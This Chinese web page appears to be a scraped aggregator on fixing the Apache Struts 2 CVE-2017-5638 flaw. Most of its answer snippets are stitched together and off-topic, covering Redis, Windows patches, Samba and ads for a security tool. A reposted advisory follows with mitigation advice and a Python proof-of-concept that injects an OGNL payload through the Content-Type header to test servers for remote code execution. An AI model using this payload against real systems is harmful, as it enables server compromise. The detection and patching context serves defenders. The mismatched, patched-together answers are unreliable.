您的位置首页 > 刊物 > 订阅 > cve-2017-5638

cve-2017-5638 struts怎么修复,cve-2017-5638 struts 2.3.5-2.3.31 为什么升到2.

2020-03-17     66    

桑青竹 cve-2017-5638 struts怎么修复 2017-03-20

l profiling:通过参数来激活或不激活分析检测功能,前提是Web项目是在开发模式下。(涉及到调试和性能检验时使用) l roles:进行权限配置的拦截器,如果登录...

桑青竹 cve-2017-5638 struts 2.3.5-2.3.31 为什么升到2.3.32 2017-03-20

在Struts 2上发现存在高危安全漏洞(CVE-2017-5638,S02-45),该漏洞影响到:Struts 2.3.5 - Struts 2.3.31,Struts 2.5 - Struts 2.5.10 漏洞编号:...

·布瓜 cve-2017-5638 struts 2.3.5-2.3.31 为什么升到2.3.32 2017-03-24

Struts2这个东西很多人认为是struts的升级版,但其实他合Struts没多大关系,仅仅只是使用方法类似,内部架构原理完全不同。 但两者都是基于Serlvet的,但struts...

桑青竹 cve-2017-5638 struts 2.3.5-2.3.31 为什么升到2.3.32 2017-03-20

1.Memcached单个key-value大小有限,一个value最大只支持1MB,而Redis最大支持512MB 2.Memcached只是个内存缓存,对可靠性无要求;而Redis更倾向于内存数据库...

anonymous cve-2017-5638 struts 2.3.5-2.3.31 为什么升到2.3.32 2017-10-21

打开控制面板,找到“程序与功能”,点击左上角“查看已安装的更新”,查看是否已经安装微软官fang的对应补丁即可。

冷泠2016 cve-2017-5638 struts 2.3.5-2.3.31 为什么升到2.3.32 2017-11-30

cve-2017-4901 这个漏洞需yao VMTools 文件和剪贴板共享 ..一旦关闭这些功能 ,,漏洞无法发挥 . 好多人都有侥幸心理 ,, 觉得只有打开了 VMTools 文件和剪贴板...

ngg79 cve-2017-5638 struts 2.3.5-2.3.31 为什么升到2.3.32 2017-10-28

建议腾讯电脑管家修复 1)腾讯电脑管家会智能匹配电脑系统,针对性推送适合系统的高危漏洞补丁,而其他安全软件可能推送非高危漏洞补丁; 2)腾讯电脑管家推送最近发布的...

帳號被封過 cve-2017-5638 struts 2.3.5-2.3.31 为什么升到2.3.32 2017-06-01

2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的...

嘻哈乌拉乱 cve-2017-5638 struts 2.3.5-2.3.31 为什么升到2.3.32 2017-10-23

系统漏洞会影响到的范围很大,包括系统本身及其支撑软件,网络客户和服务器软件,网络路由器和安全防火墙等。 腾讯电脑管家可以修复Windows操作系统漏洞,还可以...

cve-2017-5638 struts 2.3.5-2.3.31 为什么升到2.3.32 2018-11-21

cve-2017-10202的安全更新怎么下载 搜索资料 我来答 分享 微信扫一扫 新浪微博 QQ空间 举报 浏览4 次 本地图片 图片链接 代码 提交回答...

  漏洞简介

  

  CVE-2017-5638是基于 Jakarta plugin插件的Struts远程代码执行漏洞。由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过修改HTTP请求头中的Content-Type值,构造发送恶意的数据包,利用该漏洞进而在受影响服务器上执行任意系统命令。

  漏洞利用条件和方式:

  攻击者可以通过构造HTTP请求头中的Content-Type值可能造成远程代码执行。

  影响范围:

  Struts 2.3.5 – Struts 2.3.31

  Struts 2.5 – Struts 2.5.10

  漏洞修复建议(或缓解措施):

  Struts 2默认用Jakarta的Common-FileUpload的文件上传解析器,这是存在漏洞的,默认为以下配置:struts.multipart.parser=jakarta,指定其他类型的解析器,以使系统避免漏洞的影响,指定使用COS的文件上传解析器struts.multipart.parser=cos或指定使用Pell的文件上传解析器

  阿里云建议升级Struts 到Struts 2.3.32 或 Struts 2.5.10.1 版本

  阿里云云盾WAF已经支持该漏洞防御,

  黑客通过Jakarta 文件上传插件实现远程利用该漏洞执行代码。

  漏洞PoC

  import requests
import sys
def poc(url):
payload = “%{(#test=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}”
headers = {}
headers[“Content-Type”] = payload
r = requests.get(url, headers=headers)
if “105059592” in r.content:
return True
return False
if __name__ == ‘__main__’:
if len(sys.argv) == 1:
print “python s2-045.py target”
sys.exit()
if poc(sys.argv[1]):
print”vulnerable”
else:
print “not vulnerable”

  文章转载:https://www.trustauth.cn/wiki/22026.html

刊物订阅相关阅读
标签大全 | 网站地图 | RSS订阅 | 返回顶部